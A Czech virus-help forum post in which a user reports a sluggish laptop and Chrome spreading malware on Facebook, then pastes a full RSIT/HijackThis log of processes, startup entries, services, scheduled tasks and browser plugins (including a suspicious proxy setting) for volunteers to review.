Odvirování PC, zrychlení počítače, vzdálená pomoc prostřednictvím služby neslape.cz

Prosím o kontrolu logu

Máte problém s virem? Vložte sem log z FRST nebo RSIT.

Moderátor: Moderátoři

Pravidla fóra
Pokud chcete pomoc, vložte log z FRST [návod zde] nebo RSIT [návod zde]

Jednotlivé thready budou po vyřešení uzamčeny. Stejně tak ty, které budou nečinné déle než 14 dní. Vizte Pravidlo o zamykání témat. Děkujeme za pochopení.

!NOVINKA!
Nově lze využívat služby vzdálené pomoci, kdy se k vašemu počítači připojí odborník a bližší informace o problému si od vás získá telefonicky! Více na www.neslape.cz
Zamčeno
Zpráva
Autor
rivano
Návštěvník
Návštěvník
Příspěvky: 93
Registrován: 18 dub 2009 08:33

Prosím o kontrolu logu

#1 Příspěvek od rivano »

Zdravím,
prosím o kontrolu logu ntb se seká, google chrome začal rozesílat na FB viry.

Log RSIT

Logfile of random's system information tool 1.16 (written by random/random)
Run by Eva Blažková at 2017-07-17 10:51:49
Microsoft Windows 8.1 s aplikací Bing
System drive C: has 389 GB (85%) free of 459 GB
Total RAM: 3979 MB (55% free)
X64

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 10:51:55, on 17. 7. 2017
Platform: Unknown Windows (WinNT 6.02.1008)
MSIE: Internet Explorer v11.0 (11.00.9600.18123)
Boot mode: Normal

Running processes:
C:\Program Files (x86)\TeamViewer\TeamViewer.exe
C:\Program Files\AVAST Software\Avast\AvastUI.exe
C:\Program Files (x86)\Canon\Quick Menu\CNQMMAIN.EXE
C:\Program Files (x86)\Canon\Quick Menu\CNQMUPDT.EXE
C:\Program Files\trend micro\Eva Blažková_RSITx64.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://acer13.msn.com/?pc=ACJB
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.seznam.cz/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/p/?LinkId=255141
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/p/?LinkId=255141
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyServer = 85.92.34.96:80
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
F2 - REG:system.ini: UserInit=userinit.exe
O2 - BHO: Canon Easy-WebPrint EX BHO - {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexbho.dll
O2 - BHO: ExplorerBHO Class - {449D0D6E-2412-4E61-B68F-1CB625CD9E52} - C:\Program Files\Classic Shell\ClassicExplorer32.dll
O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\PROGRA~2\MICROS~2\Office14\GROOVEEX.DLL
O2 - BHO: avast! Online Security - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll
O2 - BHO: URLRedirectionBHO - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\PROGRA~2\MICROS~2\Office14\URLREDIR.DLL
O2 - BHO: ClassicIEBHO Class - {EA801577-E6AD-4BD5-8F71-4BE0154331A4} - C:\Program Files\Classic Shell\ClassicIEDLL_32.dll
O3 - Toolbar: Classic Explorer Bar - {553891B7-A0D5-4526-BE18-D3CE461D6310} - C:\Program Files\Classic Shell\ClassicExplorer32.dll
O3 - Toolbar: Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll
O4 - HKLM\..\Run: [seznam-listicka-distribuce] "C:\Program Files (x86)\Seznam.cz\distribution\szninstall.exe" -s -d listicka 1 szn-software-listicka cz.seznam.software.autoupdate
O4 - HKLM\..\Run: [CanonQuickMenu] C:\Program Files (x86)\Canon\Quick Menu\CNQMMAIN.EXE /logon
O4 - HKLM\..\Run: [IJNetworkScannerSelectorEX] C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe /FORCE
O4 - HKCU\..\Run: [cz.seznam.software.autoupdate] "C:\Users\Eva Blažková\AppData\Roaming\Seznam.cz\szninstall.exe" -c
O4 - HKCU\..\Run: [cz.seznam.software.szndesktop] "C:\Users\Eva Blažková\AppData\Roaming\Seznam.cz\bin\wszndesktop.exe" -q
O4 - HKLM\..\Policies\Explorer\Run: [BtvStack] "C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\BtvStack.exe"
O4 - Startup: Výřezy obrazovky a spuštění aplikace OneNote 2010.lnk = C:\Program Files\Microsoft Office\Office14\ONENOTEM.EXE
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office15\EXCEL.EXE/3000
O8 - Extra context menu item: E&xportovat do aplikace Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office14\EXCEL.EXE/3000
O8 - Extra context menu item: Od&eslat do aplikace OneNote - res://C:\PROGRA~1\MICROS~2\Office14\ONBttnIE.dll/105
O8 - Extra context menu item: Se&nd to OneNote - res://C:\PROGRA~1\MICROS~2\Office15\ONBttnIE.dll/105
O9 - Extra button: Odeslat do aplikace OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: Od&eslat do aplikace OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
O9 - Extra button: (no name) - {56753E59-AF1D-4FBA-9E15-31557124ADA2} - C:\Program Files\Classic Shell\ClassicIE_32.exe
O9 - Extra 'Tools' menuitem: Classic IE Settings - {56753E59-AF1D-4FBA-9E15-31557124ADA2} - C:\Program Files\Classic Shell\ClassicIE_32.exe
O9 - Extra button: P&ropojené poznámky aplikace OneNote - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
O9 - Extra 'Tools' menuitem: P&ropojené poznámky aplikace OneNote - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O18 - Filter hijack: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
O23 - Service: 602Updater (602XML Updater) - Software602 a.s. - C:\Program Files (x86)\Common Files\soft602\602updsvc\602updsvc.exe
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - c:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\WINDOWS\System32\alg.exe (file missing)
O23 - Service: aswbIDSAgent - AVAST Software s.r.o. - C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe
O23 - Service: AtherosSvc - Windows (R) Win 7 DDK provider - C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\adminservice.exe
O23 - Service: Avast Antivirus (avast! Antivirus) - AVAST Software - C:\Program Files\AVAST Software\Avast\AvastSvc.exe
O23 - Service: Intel(R) Content Protection HECI Service (cphs) - Intel Corporation - C:\WINDOWS\SysWow64\IntelCpHeciSvc.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\WINDOWS\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\WINDOWS\system32\fxssvc.exe (file missing)
O23 - Service: GamesAppIntegrationService - WildTangent - C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe
O23 - Service: GamesAppService - WildTangent, Inc. - C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe
O23 - Service: HP Support Solutions Framework Service (HPSupportSolutionsFrameworkService) - HP Inc. - C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
O23 - Service: Intel(R) Integrated Clock Controller Service - Intel(R) ICCS (ICCS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Integrated Clock Controller Service\ICCProxy.exe
O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\WINDOWS\system32\IEEtwCollector.exe (file missing)
O23 - Service: Intel(R) HD Graphics Control Panel Service (igfxCUIService1.0.0.0) - Unknown owner - C:\WINDOWS\system32\igfxCUIService.exe (file missing)
O23 - Service: Canon Inkjet Printer/Scanner/Fax Extended Survey Program (IJPLMSVC) - Unknown owner - C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE
O23 - Service: Intel(R) Capability Licensing Service Interface - Intel(R) Corporation - C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe
O23 - Service: Intel(R) Capability Licensing Service TCP IP Interface - Intel(R) Corporation - C:\Program Files\Intel\TXE Components\TCS\SocketHeciServer.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\WINDOWS\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Quick Access Service (QASvc) - Acer Incorporate - C:\Program Files\Acer\Acer Quick Access\QASvc.exe
O23 - Service: Quick Access RadioMgr Service (RMSvc) - Acer Incorporate - C:\Program Files\Acer\Acer Quick Access\RMSvc.exe
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\WINDOWS\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\WINDOWS\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\WINDOWS\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\WINDOWS\system32\sppsvc.exe (file missing)
O23 - Service: SInstalátor (ssinstall) - PS Media s.r.o. - C:\WINDOWS\SysWOW64\ssins.exe
O23 - Service: TeamViewer 11 (TeamViewer) - TeamViewer GmbH - C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
O23 - Service: User Experience Improvement Program (UEIPSvc) - acer - C:\Program Files\Acer\User Experience Improvement Program\Framework\UBTService.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\WINDOWS\system32\UI0Detect.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\WINDOWS\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\WINDOWS\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\WINDOWS\system32\wbengine.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-320 (WdNisSvc) - Unknown owner - C:\Program Files (x86)\Windows Defender\NisSrv.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-310 (WinDefend) - Unknown owner - C:\Program Files (x86)\Windows Defender\MsMpEng.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\WINDOWS\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 10791 bytes

====== Enumerating Processes ======

C:\WINDOWS\system32\wininit.exe
C:\WINDOWS\system32\svchost.exe -k DcomLaunch
C:\WINDOWS\system32\svchost.exe -k RPCSS
C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\WINDOWS\system32\svchost.exe -k netsvcs
C:\WINDOWS\system32\svchost.exe -k LocalService
C:\WINDOWS\system32\igfxCUIService.exe
C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\WINDOWS\system32\svchost.exe -k NetworkService
C:\WINDOWS\System32\spoolsv.exe
C:\WINDOWS\system32\svchost.exe -k LocalServiceNoNetwork
"C:\Program Files (x86)\Common Files\soft602\602updsvc\602updsvc.exe"
"c:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
"C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\adminservice.exe"
C:\WINDOWS\System32\svchost.exe -k utcsvc
"C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE"
"C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe"
C:\WINDOWS\system32\dashost.exe
C:\WINDOWS\SysWOW64\ssins.exe
C:\WINDOWS\system32\svchost.exe -k imgsvc
"C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe"
C:\WINDOWS\system32\svchost.exe -k LocalServiceAndNoImpersonation
"C:\Program Files\Acer\Acer Quick Access\QASvc.exe"
C:\WINDOWS\system32\SearchIndexer.exe /Embedding
C:\WINDOWS\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
"C:\Program Files\Acer\Acer Quick Access\RMSvc.exe"
"C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe"
"C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe"
"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
"C:\Program Files\Acer\User Experience Improvement Program\Framework\UBTService.exe"
C:\WINDOWS\system32\taskhost.exe
C:\WINDOWS\System32\WinLogon.exe -SpecialSession
C:\WINDOWS\System32\dwm.exe
C:\WINDOWS\system32\taskhostex.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\igfxHK.exe
C:\WINDOWS\system32\igfxTray.exe
"C:\Program Files (x86)\TeamViewer\TeamViewer.exe"
C:\Program Files\Classic Shell\ClassicStartMenu.exe
"C:\WINDOWS\system32\igfxEM.exe" -Embedding
"C:\Program Files (x86)\TeamViewer\tv_w32.exe" --action hooks --log C:\Program Files (x86)\TeamViewer\TeamViewer11_Logfile.log
"C:\Program Files (x86)\TeamViewer\tv_x64.exe" --action hooks --log C:\Program Files (x86)\TeamViewer\TeamViewer11_Logfile.log
"C:\Program Files\Acer\Acer Quick Access\QAEvent.exe"
C:\WINDOWS\system32\wbem\unsecapp.exe -Embedding
"C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\BtvStack.exe"
"C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\ActivateDesktop.exe"
C:\Program Files\AVAST Software\Avast\AvastUI.exe
"C:\Program Files\Acer\Acer Quick Access\QAMsg.exe"
"C:\Program Files\Acer\Acer Quick Access\QuickAccess.exe" -hide
"C:\Program Files (x86)\Canon\Quick Menu\CNQMMAIN.EXE"
C:\WINDOWS\splwow64.exe 8192
"C:\Program Files (x86)\Canon\Quick Menu\CNQMUPDT.EXE"
C:\WINDOWS\system32\wbem\wmiprvse.exe
"C:\WINDOWS\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe34_ Global\UsGthrCtrlFltPipeMssGthrPipe34 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
"C:\WINDOWS\system32\SearchFilterHost.exe" 0 572 576 584 65536 580
"C:\Users\Eva Blažková\Desktop\RSITx64.exe"

====== Scheduled tasks folder ======

C:\WINDOWS\system32\tasks\Adobe Acrobat Update Task - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
C:\WINDOWS\system32\tasks\Adobe Flash Player Updater - C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
C:\WINDOWS\system32\tasks\ALU - C:\Program Files (x86)\Acer\Live Updater\updater.exe -auto
C:\WINDOWS\system32\tasks\ALUAgent - C:\Program Files (x86)\Acer\Live Updater\liveupdater_agent.exe
C:\WINDOWS\system32\tasks\Avast Emergency Update - C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe
C:\WINDOWS\system32\tasks\CCleanerSkipUAC - "C:\Program Files\CCleaner\CCleaner.exe" $(Arg0)
C:\WINDOWS\system32\tasks\Quick Access - "C:\Program Files\Acer\Acer Quick Access\QALauncher.exe"
C:\WINDOWS\system32\tasks\Quick Access Quick Launcher - "C:\Program Files\Acer\Acer Quick Access\QALauncher.exe" -noui -normsvc
C:\WINDOWS\system32\tasks\SafeZone scheduled Autoupdate 1452595167 - C:\Program Files\AVAST Software\SZBrowser\launcher.exe --scheduledautoupdate
C:\WINDOWS\system32\tasks\SafeZone scheduled Autoupdate 1458760155 - C:\Program Files\AVAST Software\SZBrowser\launcher.exe --scheduledautoupdate $(Arg0)
C:\WINDOWS\system32\tasks\Trigger KMS Activation - "C:\Program Files\KMSnano\TriggerKMS.exe" 31 "silent.cmd"
C:\WINDOWS\system32\tasks\UbtFrameworkService - "C:\Program Files\Acer\User Experience Improvement Program\Framework\TriggerFramework.exe"
C:\WINDOWS\system32\tasks\WPD\SqmUpload_S-1-5-21-3699476140-735458878-2518942289-1001 - %windir%\system32\rundll32.exe portabledeviceapi.dll,#1
C:\WINDOWS\system32\tasks\Recovery Management\Notification - C:\Program Files\Acer\Acer Recovery Management\Notification\Notification.exe
C:\WINDOWS\system32\tasks\OfficeSoftwareProtectionPlatform\SvcRestartTask - %systemroot%\system32\sc.exe start osppsvc
C:\WINDOWS\system32\tasks\Microsoft\Windows\WS\License Validation - rundll32.exe WSClient.dll,WSpTLR licensing
C:\WINDOWS\system32\tasks\Microsoft\Windows\WS\WSRefreshBannedAppsListTask - rundll32.exe WSClient.dll,RefreshBannedAppsList
C:\WINDOWS\system32\tasks\Microsoft\Windows\Workplace Join\Automatic-Workplace-Join - %SystemRoot%\System32\AutoWorkplace.exe join
C:\WINDOWS\system32\tasks\Microsoft\Windows\WindowsUpdate\Scheduled Start - C:\WINDOWS\system32\sc.exe start wuauserv
C:\WINDOWS\system32\tasks\Microsoft\Windows\WindowsUpdate\Scheduled Start With Network - C:\WINDOWS\system32\sc.exe start wuauserv
C:\WINDOWS\system32\tasks\Microsoft\Windows\Windows Media Sharing\UpdateLibrary - "%ProgramFiles%\Windows Media Player\wmpnscfg.exe"
C:\WINDOWS\system32\tasks\Microsoft\Windows\Windows Filtering Platform\BfeOnServiceStartTypeChange - %windir%\system32\rundll32.exe bfe.dll,BfeOnServiceStartTypeChange
C:\WINDOWS\system32\tasks\Microsoft\Windows\Windows Error Reporting\QueueReporting - %windir%\system32\wermgr.exe -queuereporting
C:\WINDOWS\system32\tasks\Microsoft\Windows\UPnP\UPnPHostConfig - sc.exe config upnphost start= auto
C:\WINDOWS\system32\tasks\Microsoft\Windows\Time Zone\SynchronizeTimeZone - %windir%\system32\tzsync.exe
C:\WINDOWS\system32\tasks\Microsoft\Windows\Time Synchronization\SynchronizeTime - %windir%\system32\sc.exe start w32time task_started
C:\WINDOWS\system32\tasks\Microsoft\Windows\SystemRestore\SR - %windir%\system32\srtasks.exe ExecuteScheduledSPPCreation
C:\WINDOWS\system32\tasks\Microsoft\Windows\Sysmain\WsSwapAssessmentTask - %windir%\system32\rundll32.exe sysmain.dll,PfSvWsSwapAssessmentTask
C:\WINDOWS\system32\tasks\Microsoft\Windows\SpacePort\SpaceAgentTask - %windir%\system32\SpaceAgent.exe
C:\WINDOWS\system32\tasks\Microsoft\Windows\Shell\FamilySafetyMonitor - %windir%\System32\wpcmon.exe
C:\WINDOWS\system32\tasks\Microsoft\Windows\RemovalTools\MRT_HB - C:\WINDOWS\system32\MRT.exe /EHB /Q
C:\WINDOWS\system32\tasks\Microsoft\Windows\RemoteAssistance\RemoteAssistanceTask - %windir%\system32\RAServer.exe /offerraupdate
C:\WINDOWS\system32\tasks\Microsoft\Windows\Plug and Play\Sysprep Generalize Drivers - %SystemRoot%\System32\drvinst.exe 6
C:\WINDOWS\system32\tasks\Microsoft\Windows\NetTrace\GatherNetworkInfo - %windir%\system32\gatherNetworkInfo.vbs
C:\WINDOWS\system32\tasks\Microsoft\Windows\MUI\LPRemove - %windir%\system32\lpremove.exe
C:\WINDOWS\system32\tasks\Microsoft\Windows\Mobile Broadband Accounts\MNO Metadata Parser - %SystemRoot%\System32\MbaeParserTask.exe
C:\WINDOWS\system32\tasks\Microsoft\Windows\Location\Notifications - %windir%\System32\LocationNotifications.exe
C:\WINDOWS\system32\tasks\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector - %windir%\system32\rundll32.exe dfdts.dll,DfdGetDefaultPolicyAndSMART
C:\WINDOWS\system32\tasks\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticResolver - %windir%\system32\DFDWiz.exe
C:\WINDOWS\system32\tasks\Microsoft\Windows\DiskCleanup\SilentCleanup - %windir%\system32\cleanmgr.exe /autoclean /d %systemdrive%
C:\WINDOWS\system32\tasks\Microsoft\Windows\Defrag\ScheduledDefrag - %windir%\system32\defrag.exe -c -h -o -$
C:\WINDOWS\system32\tasks\Microsoft\Windows\Customer Experience Improvement Program\Consolidator - %SystemRoot%\System32\wsqmcons.exe
C:\WINDOWS\system32\tasks\Microsoft\Windows\Customer Experience Improvement Program\Uploader - %windir%\system32\WSqmCons.exe -u
C:\WINDOWS\system32\tasks\Microsoft\Windows\Bluetooth\UninstallDeviceTask - BthUdTask.exe $(Arg0)
C:\WINDOWS\system32\tasks\Microsoft\Windows\Autochk\Proxy - %windir%\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations
C:\WINDOWS\system32\tasks\Microsoft\Windows\AppxDeploymentClient\Pre-staged app cleanup - %windir%\system32\rundll32.exe %windir%\system32\AppxDeploymentClient.dll,AppxPreStageCleanupRunTask
C:\WINDOWS\system32\tasks\Microsoft\Windows\ApplicationData\CleanupTemporaryState - %windir%\system32\rundll32.exe Windows.Storage.ApplicationData.dll,CleanupTemporaryState
C:\WINDOWS\system32\tasks\Microsoft\Windows\Application Experience\AitAgent - aitagent /increment
C:\WINDOWS\system32\tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser - %windir%\system32\compattel\DiagTrackRunner.exe /UploadEtlFilesOnly
C:\WINDOWS\system32\tasks\Microsoft\Windows\Application Experience\ProgramDataUpdater - %windir%\system32\rundll32.exe %windir%\system32\invagent.dll,RunUpdate
C:\WINDOWS\system32\tasks\Microsoft\Windows\Application Experience\StartupAppTask - %windir%\system32\rundll32.exe Startupscan.dll,SusRunTask
C:\WINDOWS\system32\tasks\Microsoft\Windows\AppID\PolicyConverter - %windir%\system32\appidpolicyconverter.exe
C:\WINDOWS\system32\tasks\Microsoft\Windows\AppID\VerifiedPublisherCertStoreCheck - %windir%\system32\appidcertstorecheck.exe
C:\WINDOWS\system32\tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report - C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe /send
C:\WINDOWS\system32\tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater - C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe /f
C:\WINDOWS\system32\tasks\AVAST Software\Avast settings backup - C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe /backup /iavs

=========Mozilla firefox=========

ProfilePath - C:\Users\Eva Blažková\AppData\Roaming\Mozilla\Firefox\Profiles\n44035f3.default

prefs.js - "browser.search.useDBForOrder" - true
prefs.js - "browser.startup.homepage" - "http:/seznam.cz"

"wrc@avast.com"=C:\Program Files\AVAST Software\Avast\WebRep\FF48
"sp@avast.com"=C:\Program Files\AVAST Software\Avast\SafePrice\FF48


[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@adobe.com/FlashPlayer]
"Description"=Adobe® Flash® Player 26.0.0.137 Plugin
"Path"=C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_26_0_0_137.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@canon.com/EPPEX]
"Description"=Canon My Image Garden
"Path"=C:\Program Files (x86)\Canon\My Image Garden\AddOn\CIG\npmigfpi.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0]
"Description"=Ag Player Plugin
"Path"=c:\Program Files (x86)\Microsoft Silverlight\5.1.50907.0\npctrl.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0]
"Description"=Office Authorization plug-in for NPAPI browsers
"Path"=C:\PROGRA~2\MICROS~2\Office14\NPAUTHZ.DLL

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@microsoft.com/SharePoint,version=14.0]
"Description"=Microsoft SharePoint Plug-in for Firefox
"Path"=C:\PROGRA~2\MICROS~2\Office14\NPSPWRAP.DLL

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@software602.cz/602XML Filler]
"Description"=602XML Filler Plugin
"Path"=C:\Program Files (x86)\Software602\602XML\Filler\npfiller.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.0.1]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.1.5]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.1]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.2]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.3]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.4]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.6]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@WildTangent.com/GamesAppPresenceDetector,Version=1.0]
"Description"=WildTangent Games App V2 Presence Detector Plugin
"Path"=C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\Adobe Reader]
"Description"=Handles PDFs in-place in Firefox
"Path"=C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll


[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@adobe.com/FlashPlayer]
"Description"=Adobe® Flash® Player 26.0.0.137 Plugin
"Path"=C:\WINDOWS\system32\Macromed\Flash\NPSWF64_26_0_0_137.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0]
"Description"=Ag Player Plugin
"Path"=c:\Program Files\Microsoft Silverlight\5.1.50907.0\npctrl.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0]
"Description"=Office Authorization plug-in for NPAPI browsers
